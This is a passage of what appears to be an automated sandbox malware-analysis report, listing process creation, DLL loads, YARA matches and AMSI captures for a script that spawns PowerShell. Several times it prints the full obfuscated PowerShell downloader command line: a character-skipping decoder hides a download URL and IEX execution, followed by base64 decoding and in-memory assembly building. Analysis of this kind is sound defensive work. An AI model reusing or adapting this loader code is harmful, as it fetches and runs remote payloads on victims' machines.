gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:Dagbr
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. 
E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:DagbrJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677eJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.2138100600.000002CC9D367000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ion.pdb source: powershell.exe, 00000004.00000002.2136856117.000002CC9D1CD000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodia", "0")
              Source: Yara matchFile source: 00000009.00000002.4239592864.00000000095B5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.4239463001.0000000008370000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.4228266092.00000000055C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Galgal212)$gLobaL:pROJekTmAGerEN = [SYstEM.TExT.EnCODInG]::AsCii.geTsTrIng($SkRmkoRtEts)$GlObAL:fUnNeLFoRM=$pROJEKtMAgeREN.SUbsTRINg($TTTEdEs,$SAltEne)<#Wurrung Akseltappenes Hobbier
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Acrophony77 $Mellemstykkers $Dataoverfrsels), (Nedskre @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Trffe = [AppDomain]::CurrentDomain.GetAssemblies()$g
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Embroideress)), $Choregraphicallydeaful).DefineDynamicModule($Perfekte172, $false).DefineType($Servicekonceptets, $Standsflle14, [Syst
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Galgal212)$gLobaL:pROJekTmAGerEN = [SYstEM.TExT.EnCODInG]::AsCii.geTsTrIng($SkRmkoRtEts)$GlObAL:fUnNeLFoRM=$pROJEKtMAgeREN.SUbsTRINg($TTTEdEs,$SAltEne)<#Wurrung Akseltappenes Hobbier
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. 
E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:Dagbr
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. 
E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:Dagbr
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B70812B push ebx; ret 4_2_00007FFD9B70816A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7D7BFD push esp; ret 4_2_00007FFD9B7D7BFE
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7D7023 pushad ; ret 4_2_00007FFD9B7D7025
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7D7F93 push ecx; ret 4_2_00007FFD9B7D7F94
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7D7944 push edi; ret 4_2_00007FFD9B7D7945
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_043942D9 push ebx; ret 9_2_043942DA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0439B470 push 0000006Dh; ret 9_2_0439B4A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04393711 push esp; iretd 9_2_04393751
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0722C35C push esp; ret 9_2_0722C35D
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
